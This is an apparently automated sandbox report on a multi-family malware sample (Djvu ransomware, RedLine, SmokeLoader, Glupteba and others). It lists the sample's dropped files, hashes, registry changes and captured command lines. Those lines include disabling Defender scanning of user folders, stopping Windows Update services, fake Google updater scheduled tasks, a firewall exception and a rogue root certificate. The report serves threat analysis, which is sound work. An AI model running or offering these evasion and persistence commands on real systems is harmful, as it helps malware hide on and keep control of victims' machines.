Malware Analysis Report

2025-01-18 09:20

Sample ID 230807-nyrq5afa99
Target 76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc
SHA256 76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc
Tags
amadey djvu fabookie glupteba redline smokeloader logsdiller cloud (tg: @logsdillabot) lux3 up3 backdoor discovery dropper evasion infostealer loader persistence ransomware spyware stealer trojan pub5
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc

Threat Level: Known bad

The file 76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc was found to be: Known bad.

Malicious Activity Summary

Glupteba

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Detect Fabookie payload

Fabookie

Amadey

Detected Djvu ransomware

Glupteba payload

Djvu Ransomware

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Reads user/profile data of web browsers

Deletes itself

Modifies file permissions

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Accesses 2FA software files, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies system certificate store

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-07 11:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-07 11:48

Reported

2023-08-07 11:58

Platform

win7-20230712-en

Max time kernel

106s

Max time network

602s

Command Line

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B7A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2477.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3098.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\416C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4D7D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\91D0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62D3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AE08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000002001\2cba948feb9c53fce4409f0079aec61c.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igdbbwr N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D99B.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FC58.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4159544280-4273523227-683900707-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\373c239a-1b4b-4cd5-96cf-9ad79c86026b\\E80E.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\cacls.exe

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = <certificate blob omitted> C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\62D3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = <certificate blob omitted> C:\Users\Admin\AppData\Local\Temp\62D3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\E80E.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1204 wrote to memory of 3044 N/A N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 1204 wrote to memory of 2840 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2840 wrote to memory of 3000 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1204 wrote to memory of 2980 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2980 wrote to memory of 2868 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1204 wrote to memory of 2436 N/A N/A C:\Users\Admin\AppData\Local\Temp\BF.exe
PID 1204 wrote to memory of 1732 N/A N/A C:\Users\Admin\AppData\Local\Temp\B7A.exe
PID 3044 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\E80E.exe C:\Users\Admin\AppData\Local\Temp\E80E.exe
PID 1204 wrote to memory of 1500 N/A N/A C:\Users\Admin\AppData\Local\Temp\2477.exe
PID 1204 wrote to memory of 2932 N/A N/A C:\Users\Admin\AppData\Local\Temp\3098.exe
PID 1204 wrote to memory of 2776 N/A N/A C:\Users\Admin\AppData\Local\Temp\36B1.exe
PID 1204 wrote to memory of 2956 N/A N/A C:\Users\Admin\AppData\Local\Temp\416C.exe
PID 2932 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\3098.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe

Processes

C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe

"C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe"

C:\Users\Admin\AppData\Local\Temp\E80E.exe

C:\Users\Admin\AppData\Local\Temp\E80E.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\EC05.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\EC05.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F03A.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\F03A.dll

C:\Users\Admin\AppData\Local\Temp\BF.exe

C:\Users\Admin\AppData\Local\Temp\BF.exe

C:\Users\Admin\AppData\Local\Temp\B7A.exe

C:\Users\Admin\AppData\Local\Temp\B7A.exe

C:\Users\Admin\AppData\Local\Temp\E80E.exe

C:\Users\Admin\AppData\Local\Temp\E80E.exe

C:\Users\Admin\AppData\Local\Temp\2477.exe

C:\Users\Admin\AppData\Local\Temp\2477.exe

C:\Users\Admin\AppData\Local\Temp\3098.exe

C:\Users\Admin\AppData\Local\Temp\3098.exe

C:\Users\Admin\AppData\Local\Temp\36B1.exe

C:\Users\Admin\AppData\Local\Temp\36B1.exe

C:\Users\Admin\AppData\Local\Temp\416C.exe

C:\Users\Admin\AppData\Local\Temp\416C.exe

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\4D7D.exe

C:\Users\Admin\AppData\Local\Temp\4D7D.exe

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

"C:\Users\Admin\AppData\Local\Temp\latestplayer.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\62D3.exe

C:\Users\Admin\AppData\Local\Temp\62D3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\7C6C.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\7C6C.dll

C:\Users\Admin\AppData\Local\Temp\91D0.exe

C:\Users\Admin\AppData\Local\Temp\91D0.exe

C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\373c239a-1b4b-4cd5-96cf-9ad79c86026b" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\system32\taskeng.exe

taskeng.exe {367558B4-BE74-4D4E-8E2F-155CB26921F0} S-1-5-21-4159544280-4273523227-683900707-1000:UMAXQRGK\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\62D3.exe

C:\Users\Admin\AppData\Local\Temp\62D3.exe

C:\Users\Admin\AppData\Local\Temp\AE08.exe

C:\Users\Admin\AppData\Local\Temp\AE08.exe

C:\Users\Admin\AppData\Local\Temp\1000002001\2cba948feb9c53fce4409f0079aec61c.exe

"C:\Users\Admin\AppData\Local\Temp\1000002001\2cba948feb9c53fce4409f0079aec61c.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Roaming\igdbbwr

C:\Users\Admin\AppData\Roaming\igdbbwr

C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\D99B.exe

C:\Users\Admin\AppData\Local\Temp\D99B.exe

C:\Users\Admin\AppData\Local\Temp\2477.exe

C:\Users\Admin\AppData\Local\Temp\2477.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 544

C:\Users\Admin\AppData\Local\Temp\FC58.exe

C:\Users\Admin\AppData\Local\Temp\FC58.exe

C:\Users\Admin\AppData\Local\Temp\E80E.exe

"C:\Users\Admin\AppData\Local\Temp\E80E.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\62D3.exe

"C:\Users\Admin\AppData\Local\Temp\62D3.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\416C.exe

C:\Users\Admin\AppData\Local\Temp\416C.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\4D7D.exe

C:\Users\Admin\AppData\Local\Temp\4D7D.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\2477.exe

"C:\Users\Admin\AppData\Local\Temp\2477.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\D99B.exe

C:\Users\Admin\AppData\Local\Temp\D99B.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\91D0.exe

C:\Users\Admin\AppData\Local\Temp\91D0.exe

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1170267091-1472807412-157378901613118548589183483871454988817694016002475891329"

C:\Users\Admin\AppData\Local\Temp\91D0.exe

"C:\Users\Admin\AppData\Local\Temp\91D0.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\E80E.exe

"C:\Users\Admin\AppData\Local\Temp\E80E.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\system32\taskeng.exe

taskeng.exe {46E968B2-8A25-40EF-A5C8-D13CCE28A075} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\62D3.exe

"C:\Users\Admin\AppData\Local\Temp\62D3.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4D7D.exe

"C:\Users\Admin\AppData\Local\Temp\4D7D.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\26604c4d-b388-4e13-85f1-6795a5ffac8d\build2.exe

"C:\Users\Admin\AppData\Local\26604c4d-b388-4e13-85f1-6795a5ffac8d\build2.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\26604c4d-b388-4e13-85f1-6795a5ffac8d\build3.exe

"C:\Users\Admin\AppData\Local\26604c4d-b388-4e13-85f1-6795a5ffac8d\build3.exe"

C:\Users\Admin\AppData\Local\26604c4d-b388-4e13-85f1-6795a5ffac8d\build2.exe

"C:\Users\Admin\AppData\Local\26604c4d-b388-4e13-85f1-6795a5ffac8d\build2.exe"

C:\Users\Admin\AppData\Local\Temp\2477.exe

"C:\Users\Admin\AppData\Local\Temp\2477.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4D7D.exe

"C:\Users\Admin\AppData\Local\Temp\4D7D.exe" --Admin IsNotAutoStart IsNotTask

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\4e9609ab-444b-4354-b4a7-40d43750c226\build2.exe

"C:\Users\Admin\AppData\Local\4e9609ab-444b-4354-b4a7-40d43750c226\build2.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\4e9609ab-444b-4354-b4a7-40d43750c226\build3.exe

"C:\Users\Admin\AppData\Local\4e9609ab-444b-4354-b4a7-40d43750c226\build3.exe"

C:\Users\Admin\AppData\Local\Temp\91D0.exe

"C:\Users\Admin\AppData\Local\Temp\91D0.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\4e9609ab-444b-4354-b4a7-40d43750c226\build2.exe

"C:\Users\Admin\AppData\Local\4e9609ab-444b-4354-b4a7-40d43750c226\build2.exe"

C:\Users\Admin\AppData\Local\2d25499b-068c-4688-82fb-af0f92b9790a\build2.exe

"C:\Users\Admin\AppData\Local\2d25499b-068c-4688-82fb-af0f92b9790a\build2.exe"

C:\Users\Admin\AppData\Local\2d25499b-068c-4688-82fb-af0f92b9790a\build2.exe

"C:\Users\Admin\AppData\Local\2d25499b-068c-4688-82fb-af0f92b9790a\build2.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\2d25499b-068c-4688-82fb-af0f92b9790a\build3.exe

"C:\Users\Admin\AppData\Local\2d25499b-068c-4688-82fb-af0f92b9790a\build3.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1158132188-825149511-18267407092035810577-15118260911377412338-20716617901714743628"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230807115416.log C:\Windows\Logs\CBS\CbsPersist_20230807115416.cab

C:\Users\Admin\AppData\Local\Temp\1000002001\2cba948feb9c53fce4409f0079aec61c.exe

"C:\Users\Admin\AppData\Local\Temp\1000002001\2cba948feb9c53fce4409f0079aec61c.exe"

C:\Users\Admin\AppData\Local\8ee97299-e7fb-4143-a5d8-2a95d26d623e\build2.exe

"C:\Users\Admin\AppData\Local\8ee97299-e7fb-4143-a5d8-2a95d26d623e\build2.exe"

C:\Users\Admin\AppData\Local\8ee97299-e7fb-4143-a5d8-2a95d26d623e\build3.exe

"C:\Users\Admin\AppData\Local\8ee97299-e7fb-4143-a5d8-2a95d26d623e\build3.exe"

C:\Users\Admin\AppData\Local\8ee97299-e7fb-4143-a5d8-2a95d26d623e\build2.exe

"C:\Users\Admin\AppData\Local\8ee97299-e7fb-4143-a5d8-2a95d26d623e\build2.exe"

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

Network


Files

memory/2372-54-0x0000000000250000-0x0000000000350000-memory.dmp

memory/2372-56-0x00000000001B0000-0x00000000001B9000-memory.dmp

memory/2372-55-0x0000000000400000-0x00000000022F7000-memory.dmp

memory/1204-57-0x00000000026A0000-0x00000000026B6000-memory.dmp

memory/2372-58-0x0000000000400000-0x00000000022F7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E80E.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\E80E.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\EC05.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

memory/3000-73-0x0000000001F20000-0x0000000002164000-memory.dmp

\Users\Admin\AppData\Local\Temp\EC05.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

C:\Users\Admin\AppData\Local\Temp\F03A.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

\Users\Admin\AppData\Local\Temp\F03A.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
